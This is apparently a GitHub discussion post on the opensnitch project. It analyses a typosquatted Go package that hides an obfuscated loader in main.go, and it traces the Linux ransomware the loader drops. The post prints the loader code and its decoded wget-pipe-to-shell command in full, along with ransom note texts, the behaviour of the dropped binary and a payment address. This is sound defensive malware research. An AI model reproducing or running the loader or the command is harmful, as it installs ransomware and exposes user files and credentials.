Another typosquatting campaign targeting Go packages, delivers ramsonware malware for the Linux Desktop · evilsocket opensnitch · Discussion #1290

5 min read Original article ↗

There have been recently a couple of posts from socket.dev and @hougesen, documenting and warning about a new typosquatting campaign, targeting Go packages:

https://socket.dev/blog/typosquatted-go-packages-deliver-malware-loader
https://mhouge.dk/blog/rogue-one-a-malware-story

I wanted to test it with opensnitch, but all the repos were unavailable except one: github.com/ornatedoctrin/layout

The malicious payload is obfuscated inside the file cmd/dot2graphml/main.go:

    BDMB := []string{".", "4", " ", "t", "4", "i", "d", "r", "1", "J", "p", "/", " ", ".", ".", "e", "O", "t", "g", "7", "h", "t", "4", "e", "/", "7", "n", "d", " ", "g", "d", "f", "s", "4", "w", "5", "/", " ", "/", "s", "3", "-", "&", ":", "1", "7", "/", "d", " ", " ", "3", "t", "4", "/", "4", "o", "c", "d", "/", "|", "b", "0", "6", "e", "c", "-", "a", "b"}
    OUmUkri := runtime.GOOS == "linux"
    JDQb := "/bin/sh"
    wmbp := "-c"
    MntcdIC := BDMB[34] + BDMB[29] + BDMB[63] + BDMB[3] + BDMB[48] + BDMB[65] + BDMB[16] + BDMB[37] + BDMB[41] + BDMB[12] + BDMB[20] + BDMB[51] + BDMB[21] + BDMB[10] + BDMB[43] + BDMB[24] + BDMB[38] + BDMB[44] + BDMB[54] + BDMB[25] + BDMB[14] + BDMB[33] + BDMB[35] + BDMB[13] + BDMB[1] + BDMB[4] + BDMB[0] + BDMB[52] + BDMB[8] + BDMB[36] + BDMB[32] + BDMB[17] + BDMB[55] + BDMB[7] + BDMB[66] + BDMB[18] + BDMB[23] + BDMB[53] + BDMB[6] + BDMB[15] + BDMB[50] + BDMB[19] + BDMB[40] + BDMB[57] + BDMB[61] + BDMB[27] + BDMB[31] + BDMB[46] + BDMB[56] + BDMB[64] + BDMB[30] + BDMB[45] + BDMB[60] + BDMB[22] + BDMB[62] + BDMB[47] + BDMB[2] + BDMB[59] + BDMB[28] + BDMB[58] + BDMB[67] + BDMB[5] + BDMB[26] + BDMB[11] + BDMB[39] + BDMB[9] + BDMB[49] + BDMB[42]
    if OUmUkri {
        exec.Command(JDQb, wmbp, MntcdIC).Start()
    }

which translates to the shell command: wget -O - http://147.45.44.41/storage/de373d0df/ccd7b46d | /bin/sh &

This url was unavailable when I tested it, but I was able to download one of the other binaries documented by the socket.dev researchers: https://carvecomi.fun/storage/de373d0df/f0eee999

According to socket.dev, this was just yet-another-cryptominer:

Initially, f0eee999 shows minimal malicious behavior (such as reading /sys/kernel/mm/transparent_hugepage/), which aligns with a cryptominer or loader that remains dormant until conditions are met. Because it depends on common Linux utilities like /bin/sh, wget, and bash, the campaign specifically targets UNIX-like environments (Linux and macOS), placing developers using these systems at risk.

However this is not a cryptominer, it's a ransomware which encrypts files in the Documents/ folder among others.

  1. It's obfuscated with Garble and can be deobfuscated with gostringungarbler. The strings of the binary in plain text: https://pastebin.com/ehf4jNub

  2. Firstly it checks if the directory Documents/ exists in the home of the user who launched the ransom. If it doesn't exist, it does not continue. It also checks if the file ./check_local.txt exists, and exits in such case.

  3. It executes setxkbmap -query to obtain the keyboard configured.

  4. It creates the files RUN_THIS_APP, DO_NOT_DELETE_THIS_FILE.txt and READ_ME.txt in /home/$user, /home/$user/Desktop, /home/$user/Downloads and /home/$user/Documents.

Some of your files in the Documents folder have been encrypted in a zip archive with a password. If you want to decrypt the files and get the password from the archives, you need to run RUN_THIS_APP application from Terminal. To do this, navigate to folder with this file via Terminal and run the command ./RUN_THIS_APP

DO NOT modify or delete this file because it prevents further file encryption and it also contains an important ID for data decryption.

You will find all the information in the READ_ME.txt

###cfa989f9653d7ca494da1ca9c7ce9c70###

And proceeds to encrypt the user files with AES:
files-encrypted

  1. It also reads /home/x/.bash_history, /home/x/.config/* , /home/x/.ssh/ and /home/x/.local dirs. Basically all the directories of the user.

  2. It opens several connections to usdt.tokenview.io , apilist.tronscanapi.com and blockchair.com.

  3. It tries to display a message dialog to the user, but it didn't work in my case, so I had to run it manually (better testing is needed):

/usr/bin/zenity --warning --title Decryptor --text Some of your files in the Documents folder were encrypted in zip archives with a password. If you want to decrypt the files and get the password from the archives, you need to send 1000 USDT to the address below

TJnJ8TWMCvbnRvzCXjsvrBLVbwebsFBpr9
Network : TRC-20
Balance: 0

You can make a test payment with any number of coins, but when the balance on the address is 1000 USDT or more, you will receive a password to the archives, as well as other options such as automatic decryption of all archives. After sending a payment, just open this app again.

Note: if you execute the dropped binary RUN_THIS_APP (which is the same than the f0eee999 binary), it'll try to connect to the Xorg socket under /home/<current_user>/.Xauthority, and will display this very same message. If you do it under a different user than the one who launched the X, it'll fail.

ransom-message

--

The file f0eee999 is detected as malware by many security vendors: https://www.virustotal.com/gui/file/b0d20a3dcb937da1ddb01684f6040bdbb920ac19446364e949ee8ba5b50a29e4/community

vt

but the Behavior tab does not report all the malware activity described above. There's one comment from a contributor which described 9 days ago in detail how the malware behaves:

vt-contributor

--

go-typosquatting-screen0.webm